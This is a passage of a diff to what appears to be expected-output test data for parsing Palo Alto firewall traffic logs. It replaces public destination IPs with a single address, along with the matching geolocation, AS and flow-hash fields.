- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 128,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -11002,7 +11110,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -11017,7 +11125,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -11039,7 +11147,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q="
+ "community_id": "1:4kMe7BSg1jmAu9marx8zCErWXnE="
 }
 },
 "sequence_number": 32091178,
@@ -11059,8 +11167,8 @@
 ],
 "network": {
 "community_id": [
- "1:8CDWB7X3kkKjoV2bprSLSQY1py4=",
- "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q="
+ "1:IG1vmXIXr9XMoOn0ZR3Jpjzb/GQ=",
+ "1:4kMe7BSg1jmAu9marx8zCErWXnE="
 ],
 "transport": "udp",
 "application": "dns",
@@ -11100,14 +11208,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942023198Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031786700Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -11130,27 +11238,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 181,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -11169,7 +11279,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -11184,7 +11294,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -11206,7 +11316,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:vnb4ttnFy2i39tg89p3jkGs6eDg="
+ "community_id": "1:NpUjkT7dIbMpW4JcNZFZad7+YTk="
 }
 },
 "sequence_number": 32091179,
@@ -11226,8 +11336,8 @@
 ],
 "network": {
 "community_id": [
- "1:ScmRIn+bxqoJafQfJfEaH/CdCjE=",
- "1:vnb4ttnFy2i39tg89p3jkGs6eDg="
+ "1:g2w1ngDHewEU39cV0kn/LLmYUbE=",
+ "1:NpUjkT7dIbMpW4JcNZFZad7+YTk="
 ],
 "transport": "udp",
 "application": "dns",
@@ -11267,14 +11377,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942026632Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031792200Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -11297,27 +11407,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 121,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -11336,7 +11448,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -11351,7 +11463,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -11373,7 +11485,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8="
+ "community_id": "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE="
 }
 },
 "sequence_number": 32091180,
@@ -11393,8 +11505,8 @@
 ],
 "network": {
 "community_id": [
- "1:eupsSNkv67+oInX/FQ2hHpUMyR8=",
- "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8="
+ "1:yzXWvS3fpaPzwrvGsYmztnc8QW0=",
+ "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE="
 ],
 "transport": "udp",
 "application": "dns",
@@ -11434,14 +11546,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942030233Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031797700Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -11464,30 +11576,29 @@
 "destination": {
 "nat": {
 "port": 80,
- "ip": "23.52.174.25"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-TX",
- "city_name": "San Antonio",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Texas",
+ "region_name": "Jilin",
 "location": {
- "lon": -98.6498,
- "lat": 29.4551
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 20940,
+ "number": 4837,
 "organization": {
- "name": "Akamai International B.V."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 1246,
- "ip": "23.52.174.25",
+ "ip": "175.16.199.1",
 "packets": 5
 },
 "rule": {
@@ -11506,7 +11617,7 @@
 "packets": 6,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -11521,7 +11632,7 @@
 "destination": {
 "nat": {
 "port": 80,
- "ip": "23.52.174.25"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "tcp-fin",
@@ -11543,7 +11654,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:5ECmBtgiSUvWFJAA318pVeeu5Pw="
+ "community_id": "1:/8tg/qp7ijclMeA6CKtchq/HXx8="
 }
 },
 "sequence_number": 32091181,
@@ -11563,8 +11674,8 @@
 ],
 "network": {
 "community_id": [
- "1://eZmJioBenLsE0zEL0rhbQ7JT8=",
- "1:5ECmBtgiSUvWFJAA318pVeeu5Pw="
+ "1:8WGNPmtmu/zuzAhN183DA9tKQOA=",
+ "1:/8tg/qp7ijclMeA6CKtchq/HXx8="
 ],
 "transport": "tcp",
 "application": "ocsp",
@@ -11604,14 +11715,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "23.52.174.25",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942033695Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031803200Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -11634,27 +11745,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 315,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -11673,7 +11786,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -11688,7 +11801,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -11710,7 +11823,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek="
+ "community_id": "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y="
 }
 },
 "sequence_number": 32091182,
@@ -11730,8 +11843,8 @@
 ],
 "network": {
 "community_id": [
- "1:5CL0nRdjk2Nab0PzB6vfyC1FbtI=",
- "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek="
+ "1:WVlFLy1ZPgggGkD86Ln70kG53+s=",
+ "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y="
 ],
 "transport": "udp",
 "application": "dns",
@@ -11771,14 +11884,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 1000000000,
- "ingested": "2021-09-08T12:40:05.942037191Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031808600Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -11801,27 +11914,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 130, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -11840,7 +11955,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -11855,7 +11970,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -11877,7 +11992,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:8cb9oPS9OJnzqGAkowgmRpiqmJU=" + "community_id": "1:cEWHWAc2Xquu42JBj+eNL8udND0=" } }, "sequence_number": 32091183, 
@@ -11897,8 +12012,8 @@ ], "network": { "community_id": [ - "1:3cIrQ2yt0QUupDVmbBJXH54+2pA=", - "1:8cb9oPS9OJnzqGAkowgmRpiqmJU=" + "1:DdftFWHUV6zFdIItu/clDOeJp2w=", + "1:cEWHWAc2Xquu42JBj+eNL8udND0=" ], "transport": "udp", "application": "dns", @@ -11938,14 +12053,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942040709Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031814100Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -11968,30 +12083,29 @@ "destination": { "nat": { "port": 443, - "ip": "54.230.5.228" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Washington", + "region_name": "Jilin", "location": { - "lon": -122.3032, - "lat": 47.54 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 288, - "ip": "54.230.5.228", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -12010,7 +12124,7 @@ "packets": 5, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12025,7 +12139,7 @@ "destination": { "nat": { "port": 443, - "ip": "54.230.5.228" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -12047,7 +12161,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Qc2oBV7ermdHPwGTWFOi4D1TcLg=" + "community_id": "1:8KbQCYJwbYHBvENQZkl3srNU90Q=" } }, "sequence_number": 32091184, @@ -12067,8 +12181,8 @@ ], "network": { "community_id": [ - "1:ArbNq6iF9i1NLk5zDU1qThAZf4g=", - "1:Qc2oBV7ermdHPwGTWFOi4D1TcLg=" + "1:qW5DkhfRjZjDc2LML6UL/ILla3k=", + "1:8KbQCYJwbYHBvENQZkl3srNU90Q=" ], "transport": "tcp", "application": "incomplete", @@ -12108,14 +12222,14 @@ ], "ip": [ "192.168.15.224", - "54.230.5.228", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942095Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031819500Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", 
